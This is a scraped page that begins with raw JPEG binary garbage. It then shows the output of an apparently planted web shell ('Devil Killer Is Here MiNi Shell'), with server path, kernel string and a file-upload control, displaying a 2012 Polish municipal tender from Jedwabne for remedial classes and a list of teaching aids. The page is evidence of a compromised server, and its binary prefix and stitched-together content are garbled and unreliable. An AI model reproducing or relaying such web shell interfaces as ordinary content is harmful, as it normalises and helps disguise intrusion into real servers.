JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/108376-N-2012.html

<p class="kh_header"><b>Jedwabne: Świadczenie usługi edukacyjnej w projekcie o tytule: Indywidualizacja nauczania uczniów klas I - III w gminie Jedwabne</b><br>
<b>Numer ogłoszenia: 108376 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Jedwabnem , ul. Żwirki i Wigury 3, 18-420 Jedwabne, woj. podlaskie, tel. 086 2172130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jedwabne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule: Indywidualizacja nauczania uczniów klas I - III w gminie Jedwabne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych 
w klasach I - III. 
Celem głównym projektu jest wyrównywanie szans edukacyjnych oraz rozwinięcie zainteresowań poprzez indywidualizację procesu kształcenia dzieci z klas I - III w 100 proc. szkół podstawowych funkcjonujących na terenie gminy Jedwabne, tj.: SP w Jedwabnem, SP w Nadborach w terminie od dnia podpisania umowy  do 30.09.2013 r.
     Cele szczegółowe projektu to:
-	Zmniejszenie dysproporcji edukacyjnych i rozwojowych uczniów i uczennic szkół z gminy Jedwabne poprzez udział w dodatkowych zajęciach wyrównawczych w terminie do IX.2013 r.
-	Doposażenie szkół w materiały dydaktyczne, aby umożliwić stworzenie odpowiednich warunków indywidualnej pracy z uczniem w szkołach objętych wsparciem z gminy Jedwabne w terminie do IX.2013 r.

W zajęciach z beneficjentami  poruszona zostanie kwestia  zasady równością szans kobiet i mężczyzn w życiu społecznym. Bezpośrednim realizatorem usługi (nauczycielem) z ramienia Wykonawcy (doświadczonej firmy szkoleniowej) będzie osoba, która posiada wykształcenie kierunkowe oraz praktykę.

2.	Szczegółowy opis przedmiotu zamówienia - zespół nauczycieli, zatrudnionych przez wykonawcę, stworzy program indywidualizacji (na podstawie właściwych założeń projektowych) obejmujący tematykę następujących edukacyjnych zajęć dodatkowych:
1)	Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu:
a)	Ilość godzin - 420h łącznie dla wszystkich grup,
b)	Ilość grup - 7
- SP w Jedwabnem 4 gr. 4-osobowe - 60 h,
- SP w Nadborach 3 gr. (6 i 5)-osobowe - 60 h,
c)	Termin realizacji 
- 420h od dnia podpisania umowy do IX 2013 r.

2)	Zajęcia matematyczne:
a)	Ilość godzin - 240h łącznie dla wszystkich grup,
b)	Ilość grup - 4
- SP w Jedwabnem 2 gr. 4-osobowe - 60 h,
- SP w Nadborach 2 gr. 7-osobowe - 60 h,
c)	Termin realizacji 
- 240h od dnia podpisania umowy do IX 2013 r.
3)	Zajęcia gimnastyki korekcyjnej:
a)	Ilość godzin - 120h łącznie dla wszystkich grup,
b)	Ilość grup - 2
- SP w Jedwabnem 2 gr. 5-osobowe - 60 h,
c)	Termin realizacji 
- 120h od dnia podpisania umowy do IX 2013 r.

4)	Zajęcia rozwijające zainteresowania matematyczno-przyrodnicze:
a)	Ilość godzin - 300h łącznie dla wszystkich grup,
b)	Ilość grup - 5
- SP w Jedwabnem 2 gr. 4-osobowe - 60 h,
- SP w Nadborach 3 gr. 5-osobowe - 60 h,
c)	Termin realizacji 
- 300h od dnia podpisania umowy do IX 2013 r.

Wykonawca przed przystąpieniem do realizacji przedmiotu zamówienia poinformuje Zamawiającego (na piśmie lub osobiście - spotkanie plenarne) o autorskim programie i koncepcji przeprowadzenia zajęć. 
Zaleca się, aby oferent dokonał wizji lokalnej na terenie objętym zakresem rzeczowym zadania oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty. 
Za wypadki i szkody powstałe podczas usługi odpowiada wykonawca. Odpowiedzialność cywilną wobec osób trzecich jak i z tytułu zdarzeń losowych przyjmuje na siebie wykonawca.


Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:

(rzeczy te przeznaczone są dla dzieci ze szkół podstawowych do zajęć edukacyjnych - powinny zatem uwzględniać wiek dzieci, klasy I - III SP; powinny posiadać także odpowiednie atesty i certyfikaty zgodności z europejskimi normami oraz być w 100 procentach bezpieczne dla dzieci - beneficjentów ostatecznych w projekcie. W związku z tym, że w budżecie projektu, w większości przypadków, są one podane z nazwy, Zamawiający na podst. art. 29 ust. 3 podaje ich nazwę własną dodając wyraz lub równoważny lub samą nazwę opisową)

1.	Doposażenie bazy dydaktycznej SP w Jedwabnem:
a)	dostawa pomocy dydaktycznych:
-	Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
-	Pomoc dydaktyczna EduSensus Dysleksja pakiet 1 i 2 lub równoważna;
Pakiet I Dysleksja zawiera: 2 programy do diagnozy i terapii ryzyka dysleksji dla dzieci 6-8 lat: Ocena ryzyka dysleksji, Litery, a także: Aplikację terapeuty, Zestaw tradycyjnych pomocy dydaktycznych, Specjalistyczne szkolenie 1 osoby (o wartości 299 zł) w Akademii eduSensus. 
W Pakiecie II Dysleksja znajdują się następujące dodatki i pomoce tradycyjne: Aplikacja terapeuty - program zarządzający, Ocena przyczyn trudności w nauce czytania i pisania - moduł diagnostyczny dla dzieci w wieku 8 lat, Trening słuchania, czytania i pisania cz.1 - moduł terapeutyczny dla dzieci do 9-10 lat, ponadto dodatki: Naklejki - Gratuluję i dziękuję, Dyplomy, Książka Polska od A do Z, czyli: Cudze chwalicie - swego nie znacie, Płyta z programem Gimnastyka oka czytelnika - Płyta z programem Śpiewanie na ekranie, Kolorowe kółka, Zestaw pocztówek ortograficznych, Notes eduSensus na biurko - 1 zestaw,
-	Pomoc dydaktyczna Rzutnik multimedialny lub równoważna; Technologia: 3LCD, Rozdzielczość: XGA (1024x768), Jasność: 2.600 ANSI Lumenów, Kontrast: 500:1, Waga: 2.5 kg, Lampa: 225 W UHP (LMP-132), Żywotność lampy: do 6000 h, Wymiary (szer. x głęb. x wys..): 33,5 x 24,7 x 9,42 cm - 1 sztuka,
-	Pomoc dydaktyczna Radiomagnetofon lub równoważna; Dane techniczne: 
odtwarzanie: CD, CD-R, CD-RW, CD, MP3 WMA-CD, 20 programowalnych utworów, technologia magnetofonów kasetowych: Mechaniczna, antena FM, zakres częstotliwości: FM, MW, automatyczne dostrajanie cyfrowe, pamięć 40 kanałów radiowych, moc wyjściowa (RMS): 2 x 4 W, Dynamic Bass Boost - 2 kroki, system dźwięku: Stereo, średnica głośnika: 4 cale, typ głośników: 2-drożne bass reflex, 2 wbudowane głośniki, wyświetlacz LCD - 1 sztuka,
-	Pomoc dydaktyczna EduSensus LogoGry lub równoważna; zestaw 26 gier, które wspomagają i uatrakcyjniają terapię logopedyczną dzieci z zaburzeniami słuchu i mowy, a także dzieci z autyzmem, mutyzmem i opóźnionym rozwojem umysłowym. W skład zestawu LOGO-Gier wchodzą m. in.: Logo-Malarz, Logo-Kręcik, Logo-Poziom, Logo-Papuga, Logo-Locik, Logo-Cel, Logo-Szum, Logo-Łapka, Logo-Tenis, Logo-Muzyk - 1 zestaw,
-	Pomoc dydaktyczna Symetric lub równoważna; blat wykonany jest z białej płyty MDF ograniczonej drewnianymi listwami o wymiarze 70 x 40 cm, zestaw zawiera 20 przezroczystych kart - wzorów w formacie A4 - 2 sztuki, 
-	Pomoc dydaktyczna Trzykurs gra ucząca koordynacji i współpracy, wym.: 37 x 37 cm - 1 sztuka,
-	Pomoc dydaktyczna Tuba Gąsienice lub równoważna; w zestawie: 4 gąsienice, 4 bambusowe łyżki z gumką, 36 kulek z liczbami 1-9, bambusowa listwa na żetony, 20 kolorowych żetonów - 1 sztuka,
-	Pomoc dydaktyczna Dmuchajka lub równoważna; w zestawie: dmuchajka wykonana z drewna bukowego o średnicy 6 cm i wysokości 5 cm, 2 piłeczki styropianowe o średnicy 25 mm oraz 10 słomek - 4 sztuki,
-	Pomoc dydaktyczna Memory z szufladkami - płytki zadaniowe i plansza zadaniowa lub równoważna; w zestawie: 5 drewnianych szufladek, 130 drewnianych płytek z obrazkami w różnych wersjach kolorystycznych, drewniana skrzyneczka - 1 zestaw (płytki zadaniowe i plansza zadaniowa),
-	Pomoc dydaktyczna Spiralny labirynt lub równoważna; przeznaczony do ćwiczeń rozwijających sprawność manualną, dzięki czemu doskonale przygotowuje do nauki pisania, wym.: 27 x 27 x 7 cm - 2 sztuki,
-	Pomoc dydaktyczna Zegar i Tetris lub równoważna; ścianka manipulacyjna - wymiary tablicy: 139 x 86 cm, w zestawie: 58 kolorowych klocków do zegara, 168 krążków, plastikowy pojemnik na krążki - 1 zestaw (zegar i tetris oraz zestaw krążków),
-	Pomoc dydaktyczna Scieżki magnetyczne II lub równoważna; w skład zestawu wchodzą: 6 plastikowych plansz ze szlaczkami (34,5 x 25 cm), 6 magnetycznych figurek (3,5 cm; uchwyt 6 cm) - 1 sztuka,
-	Pomoc dydaktyczna Podstawka do ścieżek magnetycznych lub równoważna; wym. 36 x 30 x 14 cm - 6 sztuk,
-	Pomoc dydaktyczna Niekończąca się ósemka lub równoważna; w zestawie: tor w kształcie litery S, 2 piłeczki, wym.: 34 x 21 x 4,5 cm - 1 sztuka,
-	Pomoc dydaktyczna Piłki z kuleczkami lub równoważna; piłki wypełnione są kuleczkami z PVC i nietoksycznym żelem umożliwiającym przemieszczanie się kulek podczas ściskania - 1 sztuka,
-	Pomoc dydaktyczna Ładnie mówię głoskę K,G,H lub równoważna; w zestawie: 70 obrazków (zdjęć) podzielonych na trzy zestawy oraz instrukcja z propozycjami gier - 1 sztuka,
-	Pomoc dydaktyczna Ładnie mówię głoskę SZ,C,DZ lub równoważna; w zestawie: 70 obrazków (zdjęć) podzielonych na trzy zestawy oraz instrukcja z propozycjami gier - 1 sztuka,
-	Pomoc dydaktyczna Ładnie mówię głoskę R lub równoważna; w zestawie: 70 obrazków (zdjęć) podzielonych na trzy zestawy oraz instrukcja z propozycjami gier - 1 sztuka,
-	Pomoc dydaktyczna Ładnie mówię głoskę S,Z,C,DZ lub równoważna; w zestawie: 70 obrazków (zdjęć) podzielonych na trzy zestawy oraz instrukcja z propozycjami gier - 1 sztuka,
-	Pomoc dydaktyczna Ładnie mówię głoski SZ,Z,CZ,DZ lub równoważna; w zestawie: 70 obrazków (zdjęć) podzielonych na trzy zestawy oraz instrukcja z propozycjami gier - 1 sztuka,
-	Pomoc dydaktyczna Makatka edukacyjna Jabłko lub równoważna; makatka na kartoniki z literami i cyframi, wym.: 90 x 85 cm - 2 sztuki,
-	Pomoc dydaktyczna Zestaw kartoników z literami i znakami lub równoważna; w zestawie: 583 kartoniki z drukowanymi małymi i wielkimi literami, cyframi 0-9, znakami interpunkcyjnymi oraz znakami działań - 2 sztuki,
-	Pomoc dydaktyczna Twister sensoryczny lub równoważna; 6 elastycznych krążków z kolcami o różnej twardości, śr. 15 cm, gr. 3 cm - 1 sztuka,
-	Pomoc dydaktyczna Memo ortograficzne CH i H lub równoważna; w zestawie: 30 par kartoników, 4 duże obrazki, 4 zestawy małych kartoników, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Memo ortograficzne RZ i Z lub równoważna; w zestawie: 30 par kartoników, 4 duże obrazki, 4 zestawy małych kartoników, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Memo Rerki lub równoważna; w zestawie: 72 kartoniki (36 par) z obrazkami, których atrybuty zawierają w swej nazwie słowo z głoską R - 1 sztuka,
-	Pomoc dydaktyczna Memo Szumki lub równoważna; w zestawie: 72 kartoniki (36 par) z obrazkami, których atrybuty zawierają w swej nazwie słowo z głoskami: SZ, Z, CZ, DZ - 1 sztuka,
-	Pomoc dydaktyczna Glottodywanik - litery podstawowe i niepodstawowe lub równoważna; w zestawie: dwa dywaniki - jeden z literami podstawowymi, a drugi z literami nie podstawowymi, wym.: 206 x 110 cm - 1 sztuki,
-	Pomoc dydaktyczna Nauka ortografi z Glottodywanikiem - książka lub równoważna; propozycje zabaw z glottodywanikiem - 1 sztuka,
-	Pomoc dydaktyczna Domino logopedyczne L-R lub równoważna; w zestawie: 27 par obrazków ilustrujących przedmioty, zwierzęta i osoby, których nazwy rozpoczynają się głoskami opozycyjnymi zestawu L-R - 1 sztuka,
-	Pomoc dydaktyczna Domino logopedyczne Z(RZ)-Z lub równoważna; w zestawie:  27 par obrazków ilustrujących przedmioty, zwierzęta i osoby, których nazwy rozpoczynają się głoskami opozycyjnymi zestawu Z (RZ)-Z - 1 sztuka,
-	Pomoc dydaktyczna Domino logopedyczne L-J  lub równoważna; w zestawie: 27 par obrazków ilustrujących przedmioty, zwierzęta i osoby, których nazwy rozpoczynają się głoskami opozycyjnymi zestawu L-J - 1 sztuka,
-	Pomoc dydaktyczna Domino logopedyczne J-R lub równoważna; w zestawie: 27 par obrazków ilustrujących przedmioty, zwierzęta i osoby, których nazwy rozpoczynają się głoskami opozycyjnymi zestawu J-R - 1 sztuka,
-	Pomoc dydaktyczna Piłka Tai-Chi lub równoważna; śr.: 20 cm - 2 sztuki,
-	Pomoc dydaktyczna Tablica + gąbka i 3 pisaki lub równoważna; wym.: 30 x 22 cm 8 sztuk,
-	Pomoc dydaktyczna Literki - zestaw do przewlekania lub równoważna; wym. pudełka: 32,5 x 29 x 2,5 cm - 2 sztuki,
-	Pomoc dydaktyczna EduSensus. Czytam i piszę - interaktywna nauka języka polskiego lub równoważna; program multimedialny - zestaw ćwiczeń interaktywnych wprowadzający w świat liter, wyrazów, zdań i tekstów - 1 sztuka,
-	Pomoc dydaktyczna Kostki piankowe - alfabet A,B,C,D lub równoważna; kostki arytmetyczno-literowe z literami A,B,C,D, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet E,F,G,H lub równoważna; kostki arytmetyczno-literowe z literami E,F,G,H, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet I,J,K,L lub równoważna; kostki arytmetyczno-literowe z literami I,J,K,L, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet Ł,M,N,O lub równoważna; kostki arytmetyczno-literowe z literami Ł,M,N,O, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet P,R,S,T lub równoważna; kostki arytmetyczno-literowe z literami P,R,S,T, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet U,W,Y,Z lub równoważna; kostki arytmetyczno-literowe z literami U,W,Y,Z, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet X,Ż,Ć,Ś lub równoważna; kostki arytmetyczno-literowe z literami X,Z,C,C, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Kostki piankowe - alfabet Ż,Ą,Ę,Ń lub równoważna; kostki arytmetyczno-literowe z literami Z,Ą,Ę,N, wym.: 30 x 30 x 30 cm - 2 sztuki,
-	Pomoc dydaktyczna Alfabet - nauka czytania i pisania - gra lub równoważna;  program zawiera ćwiczenia, które uczą alfabetu oraz czytania i pisania - 1 sztuka,
-	Pomoc dydaktyczna Alfabet - komplet liter zaproponowane przez wykonawcę - 4 sztuki,
-	Pomoc dydaktyczna Wesołe abecadło - gra lub równoważna; wymiary: 5 x 25 x 19 - 1 sztuka,
-	Pomoc dydaktyczna EduROM. Czytam i piszę - interaktywna nauka języka polskiego lub równoważna; w skład programu wchodzą: 176 różnorodnych zadań, ponad 200 multimedialnych stron, ilustrowany słowniczek ortograficzny - 1 zestaw,
-	Pomoc dydaktyczna Przeplatanka ze wzorkami - ćwiczenia manualne lub równoważna; w zestawie: podstawka 20,5 x 23,50 cm, szydełko, 4 kolorowe sznureczki - 8 sztuk,
-	Pomoc dydaktyczna Uchwyty na ołówek śr. 9 mm; 10 szt. w opakowaniu - 1 zestaw,
-	Pomoc dydaktyczna Zestaw Aximo duże lub równoważna; w zestawie: 1512 szt. kolorowych spinek, karty ze wzorami (17 wzorów), 3 duże grzebienie ze stojakiem i górną listwą - 1 zestaw,
-	Pomoc dydaktyczna Supły manipulacyjne lub równoważna; dł.: 48 cm - 2 sztuki,
-	Pomoc dydaktyczna Logico Picolo - ramka do książeczek lub równoważna; wym.: 23 x 28 cm - 8 sztuk,
-	Pomoc dydaktyczna Logico Picolo - Czytamy bajki - Królewna Śnieżka - książeczka lub równoważna; format: B5, stron: 32 - 4 sztuki,
-	Pomoc dydaktyczna Logico Picolo - Czytamy bajki - Czerwony Kapturek - książeczka lub równoważna; format: B5, stron: 32 - 4 sztuki,
-	Pomoc dydaktyczna Logico Picolo - Różowa ortografia cz. 1 - książeczka lub równoważna; format: B5, stron: 16 - 4 sztuki,
-	Pomoc dydaktyczna Logico Picolo - Różowa ortografia cz. 2 - książeczka lub równoważna; format: B5, stron: 16 - 4 sztuki,
-	Pomoc dydaktyczna Logico Picolo - Różowa ortografia cz. 3 - książeczka lub równoważna; format: B5, stron: 16 - 4 sztuki,
-	Pomoc dydaktyczna Literki małe i duże - gra lub równoważna; wym.: 4 x 25 x 20 - 1 sztuka,
-	Pomoc dydaktyczna Memo ortograficzne U i Ó lub równoważna; w zestawie: 30 par kartoników, 4 duże obrazki, 4 zestawy małych kartoników, instrukcja - 1 sztuka,
-	Pomoc dydaktyczna Duży ruchomy alfabet I lub równoważna; wym.: 39 x 63 cm - 1 zestaw,
-	Pomoc dydaktyczna Duży ruchomy alfabet II lub równoważna; zestaw składa się z 72 liter (24 litery, każda w trzech sztukach), podzielonych kolorystycznie na spółgłoski i samogłoski oraz 6 znaków interpunkcyjnych - 1 zestaw,
-	Pomoc dydaktyczna Książeczka Dysneya - Wróżki - czytanie lub równoważna; format 20,5 x 29,0 cm, 64 strony - 8 sztuk,
-	Pomoc dydaktyczna Lotto Ortografia lub równoważna; wym.: 4 x 28 x 17 - 1 sztuka,
-	Pomoc dydaktyczna Sylaby do zabawy lub równoważna; w zestawie: 55 kart biedronek, 55 kart ilustracji, plansza do gry, 5 pionków, kostka, instrukcja - 1 zestaw,
-	Pomoc dydaktyczna Głoski do zabawy lub równoważna; w zestawie: 55 kart biedronek, 55 kart ilustracji, plansza do gry, 5 pionków, kostka, instrukcja - 1 zestaw,
-	Pomoc dydaktyczna Dom i miasto lub równoważna; wym. kart: 13,5 x 19,5 cm; 25 kart i 150 czerwonych żetonów - 1 zestaw,
-	Pomoc dydaktyczna Środowisko naturalne i zwierzęta lub równoważna; wym. kart: 13,5 x 19,5 cm; 25 kart - 1 zestaw,
-	Pomoc dydaktyczna Lotto dźwiękowe - Zwierzęta lub równoważna; zawartość: płyta CD (52 minuty), 6 kart po 6 różnych fotografii (25x 19 cm), 40 żetonów śr. 3,5 cm, instrukcja - 1 zestaw,
-	Pomoc dydaktyczna Dyslektyczne ucho. Zbiór ćwiczeń stymulujacych rozwój percepcji słuchowej nie tylko dla uczniów z dysleksja - ćwiczenia lub równoważna;  format A4, książka 76 str., zeszyt 44 str. - 4 sztuki,
-	Pomoc dydaktyczna Dyslektyczne ucho. Zbiór ćwiczeń stymulujacych rozwój percepcji słuchowej nie tylko dla uczniów z dysleksją - książka lub równoważna; wym. 20,5 x 29, liczba stron: 73 - 1 sztuka,
-	Pomoc dydaktyczna Trening słuchu lub równoważna; ponad 200 zabaw kształtujących percepcję słuchową, A4, str. 136 - 1 sztuka,
-	Pomoc dydaktyczna Metoda dobrego startu - Od wierszyka do literki. Zeszyt 1 lub równoważna; A4, Stron: 60 - 1 sztuka,
-	Pomoc dydaktyczna Metoda dobrego startu - Od wierszyka do literki. Zeszyt 2 lub równoważna; A4, Stron: 56 - 1 sztuka,
-	Pomoc dydaktyczna Zabawy słuchowe. Ćwiczenia dla uczniów klas 0 i I-III lub równoważna; A4, str. 136 - 1 sztuka,
-	Pomoc dydaktyczna Perskie oko. Ćwiczenia percepcji wzrokowej dla dzieci w młodszym wieku szkolnym lub równoważna; w zestawie: 50 kolorowych kart + zeszyt (8 stron), format: A4 - 1 sztuka,
-	Pomoc dydaktyczna Złap piłkę lub równoważna; w zestawie: 3 szt. dł. 38 cm, śr. piłki: 7 cm - 1 sztuka,
-	Pomoc dydaktyczna PUS. Idę do szkoły 1 lub równoważna; poręczne zamykane pudełko z plastiku, w którym znajduje się 12 ponumerowanych klocków, format: 260 x 140, stron: 24 - 4  sztuki,
-	Pomoc dydaktyczna PUS. Idę do szkoły 2 lub równoważna; poręczne zamykane pudełko z plastiku, w którym znajduje się 12 ponumerowanych klocków, format: 260 x 140, stron: 24 - 4  sztuki,

2.	Doposażenie bazy dydaktycznej SP w Nadborach:
a)	dostawa pomocy dydaktycznych:
-	Pomoc dydaktyczna Mikroskop lub równoważna; dane techniczne: długość tubusu: 160 mm, głowica binokularowa, pochylenie 30, rewolwer obiektywowy czterogniazdowy, obiektywy achromatyczne 4x, 10x, 40x, 100x (imersyjny, amortyzowany), system ogniskowania: ruch zgrubny (śruba makrometryczna) i ruch drobny (śruba mikrometryczna), czułość i działka drobnego (śruba mikrometryczna) ogniskowania: 0,004mm, zakres 24mm, działka elementarna ruchu drobnego (mikroruchów) - 4?m, kondensor Abbego N.A. 1,2, stolik: mocowanie dwóch preparatów, wymiary stolika: 132mm x 142mm, zakres ruchu XY: 75mm x 40mm, oświetlenie: dioda LED 3W, kondensor jasnego pola z przysłoną irysową, regulacja dioptrii na lewym torze optycznym: +- 5D, zakres regulacji odległości miedzy źrenicami: 55 mm - 75 mm, dopuszczalna temperatura otoczenia: od 0C do +40C, wbudowana kamera  - 1 sztuka,
-	Pomoc dydaktyczna Lupy lub równoważna; szkiełko powiększające śr. 10, 5cm, gumowa rączka do trzymania, wys. 20 cm - 6 sztuk,
-	Pomoc dydaktyczna Od piosenki do literki - książka lub równoważna; podręcznik dla nauczyciela z 48 scenariuszami zajęć oraz zapisem nutowym piosenek, format: 20,5 x 29cm, str. 114 - 1 sztuka,
-	Pomoc dydaktyczna Ćwiczenia do zajęć wyrównawczych - karty pracy lub równoważna; zestaw kart pracy zawiera zróżnicowane zadania, które mają na celu utrwalanie kształtu liter oraz cyfr, poprawę koordynacji wzrokowo-słuchowej oraz wspomaganie umiejętności liczenia i pisania, format: A4,  liczba stron: 50 - 1 sztuka,
-	Pomoc dydaktyczna Słowa i zdania karty pracy lub równoważna; w zestawie: 22 karty A4 i wzory do budowy zdań o różnej długości - 1 sztuka,
-	Pomoc dydaktyczna Czytam i piszę - interaktywna nauka czytania i pisania lub równoważna; w skład programu wchodzą: 176 różnorodnych zadań, ponad 200 multimedialnych stron, ilustrowany słowniczek ortograficzny - 1 zestaw,
-	Pomoc dydaktyczna Gry czytelnicze cz. 1 i 2 lub równoważna; gry składają się z fragmentów tekstów i ilustracji, format: A4, Liczba stron: 66 - 3 sztuki,
